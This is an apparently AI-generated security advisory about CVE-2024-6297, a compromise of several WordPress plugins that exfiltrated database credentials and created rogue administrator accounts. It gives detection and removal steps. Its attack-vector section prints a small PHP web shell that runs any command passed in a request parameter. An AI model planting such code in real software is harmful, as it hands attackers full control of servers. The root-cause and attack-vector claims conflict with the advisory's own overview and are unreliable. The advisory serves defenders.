CVE-2024-6297 Overview
Several plugins for WordPress hosted on WordPress.org have been compromised and injected with malicious PHP scripts. A malicious threat actor compromised the source code of various plugins and injected code that exfiltrates database credentials and is used to create new, malicious, administrator users and send that data back to a server. Currently, not all plugins have been patched and we strongly recommend uninstalling the plugins for the time being and running a complete malware scan.
Critical Impact
Unauthorized administrative access and data exfiltration due to plugin compromise.
Affected Products
- Blaze Widget
- Contact Form 7 Multi-Step Addon
- Social Warfare
Discovery Timeline
- 2024-06-25 - CVE CVE-2024-6297 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2024-6297
Vulnerability Analysis
The vulnerability involves the injection of malicious PHP scripts into several WordPress plugins. These scripts are engineered to extract sensitive database information and insert unauthorized administrative users. This compromise likely involves the exploitation of weak input validation or insecure coding practices within the affected plugins, allowing remote PHP code execution.
Root Cause
The primary issue is insecure coding practices that allowed the insertion of malicious code during plugin updates or upload processes. Lack of proper integrity checks during plugin distribution facilitated this attack.
Attack Vector
Network-based exploitation, as the malicious actor can manipulate plugin code via HTTP requests.
<?php
// Example of sanitized malicious PHP payload
if (isset($_REQUEST['cmd'])) {
$exec = shell_exec($_REQUEST['cmd']);
echo $exec;
}
?>
Detection Methods for CVE-2024-6297
Indicators of Compromise
- Unusual admin accounts in WordPress
- Network traffic to unknown external servers
- Altered PHP files within plugins
Detection Strategies
To detect this vulnerability, monitor for unusual changes in WordPress admin user lists and unexpected network activity targeting external IPs. Employ file integrity monitoring on plugin directories to detect unauthorized changes.
Monitoring Recommendations
Set up alerting for any modifications to core WordPress files or plugin directories, and track outgoing traffic to detect unauthorized exfiltration attempts.
How to Mitigate CVE-2024-6297
Immediate Actions Required
- Uninstall the compromised plugins immediately.
- Change all WordPress admin credentials.
- Conduct a comprehensive malware and integrity scan.
Patch Information
Continuous monitoring of the WordPress plugin repository for updates and patches to compromised plugins is essential. Monitor the WordPress plugin pages for any security advisories about updates.
Workarounds
Until official patches are available, disable the affected plugins and restore WordPress installations from clean backups to ensure no residual malicious scripts remain.
# Shell script to disable a plugin
wp plugin deactivate <plugin-slug>
wp plugin delete <plugin-slug>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
